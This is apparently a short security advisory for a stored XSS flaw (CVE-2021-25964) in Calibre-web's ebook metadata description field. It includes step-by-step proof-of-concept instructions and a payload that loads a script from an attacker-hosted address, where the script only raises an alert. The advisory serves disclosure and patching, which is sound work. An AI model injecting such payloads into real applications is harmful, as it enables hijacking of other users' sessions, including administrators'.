CVE-2021-25964

Overview

In “Calibre-web” application, v0.6.0 to v0.6.12, are vulnerable to Stored XSS in “Metadata”. An attacker that has access to edit the metadata information, can inject JavaScript payload in the description field. When a victim tries to open the file, XSS will be triggered.

Details

The “Calibre-web” application is vulnerable to “Stored XSS” in Metadata. An attacker who has access to edit metadata information can inject JavaScript payload in the description field. When a victim tries to open the file, XSS will be triggered.

PoC Details

For demonstration purposes, we will use two users:
1. Alice, a low privileged user.
2. Admin, an administrator user.
Login into the application as Alice and open any ebook. Click on Edit Metadata. Now, click on save and intercept the request. Observe the parameter “description”, the content of it is sent inside HTML tags. Now inject the below payload immediately after the HTML tag and forward the request. The injected payload is saved in the file's metadata.
Login into application as Admin (victim). Now click on the ebook available on the dashboard, and notice the payload being triggered.

PoC Code

// Injected payload after the description parameter
<p>calibre Quick Start Guide</p><script src=http://192168.0.105:4444/xss.js></script>

// Contents of xss.js file hosted on the attacker’s server:
alert(“XSS”);

Affected Environments

Calibre-web versions v0.6.0 to v0.6.12

Prevention

Update to calibreweb version 0.6.13